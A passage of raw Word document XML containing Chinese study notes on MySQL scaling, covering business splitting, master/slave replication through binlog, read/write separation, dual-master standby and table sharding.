        <w:t>向账户</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>转账</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE3B6D" w:rsidRPr="00F41A4C" w:rsidRDefault="00DE3B6D" w:rsidP="00DE3B6D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D40882" w:rsidRPr="00F41A4C" w:rsidRDefault="00D40882" w:rsidP="00D40882">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.6 mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分库分表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002790D" w:rsidRPr="00F41A4C" w:rsidRDefault="0002790D" w:rsidP="0002790D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidR="00902281">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0097001B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>业务拆分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0002790D" w:rsidRPr="00F41A4C" w:rsidRDefault="0002790D" w:rsidP="002C728B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>业务不断发展</w:t>
      </w:r>
      <w:r w:rsidR="00E273F0" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，单个库访问与负载越来越大，业务进行拆分。</w:t>
      </w:r>
      <w:r w:rsidR="00072838" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>每一个业务使用单独的数据库来存储，</w:t>
      </w:r>
      <w:r w:rsidR="009F3E59" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>不同业务访问不同的数据库</w:t>
      </w:r>
      <w:r w:rsidR="00C24B62" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，吞吐能力大大提高了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E63A07" w:rsidRPr="00F41A4C" w:rsidRDefault="00E63A07" w:rsidP="002C728B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>业务拆分提供系统扩展性并提高工作效率。工程启动和部署、测试简单</w:t>
      </w:r>
      <w:r w:rsidR="005A2C6A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D308E" w:rsidRPr="00F41A4C" w:rsidRDefault="007A09D0" w:rsidP="007A09D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidR="004D308E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>复制策略：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302111" w:rsidRPr="00F41A4C" w:rsidRDefault="00302111" w:rsidP="002C728B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>访问量增加，拆分后的某个库压力越来越大</w:t>
      </w:r>
      <w:r w:rsidR="00B0198C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，通过复制策略来对系统进行扩展。</w:t>
      </w:r>
      <w:r w:rsidR="00F150C2" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidR="00F150C2" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r w:rsidR="00F150C2" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>集群中任意一台服务器，都能读到相同的数据，这样每台</w:t>
      </w:r>
      <w:r w:rsidR="00F150C2" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r w:rsidR="00F150C2" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的负载会大大降低。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA42B5" w:rsidRPr="00F41A4C" w:rsidRDefault="00BA42B5" w:rsidP="002C728B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Master/Slave</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>binary log</w:t>
      </w:r>
      <w:r w:rsidR="00670D5A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.Master</w:t>
      </w:r>
      <w:r w:rsidR="00670D5A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r w:rsidR="00EC3129" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>binary log.</w:t>
      </w:r>
      <w:r w:rsidR="009170E6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009170E6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>复制策略有两种：一条语句</w:t>
      </w:r>
      <w:r w:rsidR="009170E6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(statement level), </w:t>
      </w:r>
      <w:r w:rsidR="009170E6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>也额可以基于一条记录</w:t>
      </w:r>
      <w:r w:rsidR="009170E6" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(row level)</w:t>
      </w:r>
      <w:r w:rsidR="00144D5E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D308E" w:rsidRPr="00F41A4C" w:rsidRDefault="00647646" w:rsidP="002C728B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>读写分离：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>负责数据写入，数据通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>binlog</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>同步到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>slave</w:t>
      </w:r>
      <w:r w:rsidR="00AF1CA1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF1CA1" w:rsidRPr="00F41A4C" w:rsidRDefault="00AF1CA1" w:rsidP="002C728B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">          Slave</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>处理数据读取请求</w:t>
      </w:r>
      <w:r w:rsidR="00330342" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330342" w:rsidRPr="00F41A4C" w:rsidRDefault="0051182C" w:rsidP="002C728B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>一般应用读压力比写压力大一些。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E11D7" w:rsidRPr="00F41A4C" w:rsidRDefault="001E11D7" w:rsidP="002C728B">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>可能存在单点故障</w:t>
      </w:r>
      <w:r w:rsidR="00D26A22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，采用</w:t>
      </w:r>
      <w:r w:rsidR="00D26A22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dual-master</w:t>
      </w:r>
      <w:r w:rsidR="00D26A22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>方式，将对方作为自己的</w:t>
      </w:r>
      <w:r w:rsidR="00D26A22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r w:rsidR="00D26A22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，自己作为对方的</w:t>
      </w:r>
      <w:r w:rsidR="00D26A22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Slave</w:t>
      </w:r>
      <w:r w:rsidR="00D26A22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，任何一台服务器上的数据变更，都会通过</w:t>
      </w:r>
      <w:r w:rsidR="00D26A22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r w:rsidR="00D26A22" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的复制机制同步到另一台服务器。</w:t>
      </w:r>
      <w:r w:rsidR="00E96BF8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>我们仅开启一台</w:t>
      </w:r>
      <w:r w:rsidR="00E96BF8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidR="00E96BF8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>写入，另一台</w:t>
      </w:r>
      <w:r w:rsidR="00E96BF8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidR="00E96BF8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>仅仅</w:t>
      </w:r>
      <w:r w:rsidR="00E96BF8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Standby</w:t>
      </w:r>
      <w:r w:rsidR="00E96BF8" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>仅作为读来开放。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00174C0D" w:rsidRPr="00F41A4C" w:rsidRDefault="0039152C" w:rsidP="0039152C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>）分库分表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B73EB6" w:rsidRPr="00F41A4C" w:rsidRDefault="0039152C" w:rsidP="0039152C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Master/Slave</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>主要是读进行扩展，</w:t>
      </w:r>
      <w:r w:rsidRPr="00D17E08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>写还是集中在</w:t>
      </w:r>
      <w:r w:rsidRPr="00D17E08">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidR="009F0346" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E01B51" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Slave</w:t>
      </w:r>
      <w:r w:rsidR="00E01B51" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的数量与</w:t>
      </w:r>
      <w:r w:rsidR="00E01B51" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Master</w:t>
      </w:r>
      <w:r w:rsidR="00E01B51" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的处理能力有很大关联。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B73EB6" w:rsidRPr="00F41A4C" w:rsidRDefault="00B73EB6" w:rsidP="00B73EB6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>对于数据量巨大且访问频繁的单表，减少单表的记录条数，以便于减少数据查询的时间，提高数据库的吞吐</w:t>
      </w:r>
      <w:r w:rsidR="00EA380F" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>能力</w:t>
      </w:r>
      <w:r w:rsidR="00B003B2" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>这就是所谓的分表。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E41A78" w:rsidRPr="00F41A4C" w:rsidRDefault="00E41A78" w:rsidP="00B73EB6">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>分表策略：数据能够均匀分布到多张表中，不影响正常查询。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039152C" w:rsidRPr="00F41A4C" w:rsidRDefault="0039152C" w:rsidP="0039152C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0011386C" w:rsidRPr="00F41A4C" w:rsidRDefault="0011386C" w:rsidP="0011386C">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4860024" cy="2183642"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="图片 1" descr="C:\Users\Administrator\AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\ZG(O5M}1AYM[~]8S`{H${`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AppData\Roaming\Tencent\Users\57548991\QQ\WinTemp\RichOle\ZG(O5M}1AYM[~]8S`{H${`S.png"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId222" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4862090" cy="2184570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0039152C" w:rsidRPr="00F41A4C" w:rsidRDefault="0039152C" w:rsidP="0039152C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0039152C" w:rsidRPr="00F41A4C" w:rsidRDefault="00076484" w:rsidP="00076484">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>分表能够解决</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>单表数据量过大</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>带来查询效率下降的问题，但无法给数据库的并发处理能力带来本质提升</w:t>
      </w:r>
      <w:r w:rsidR="00857945" w:rsidRPr="00F41A4C">
        <w:rPr>
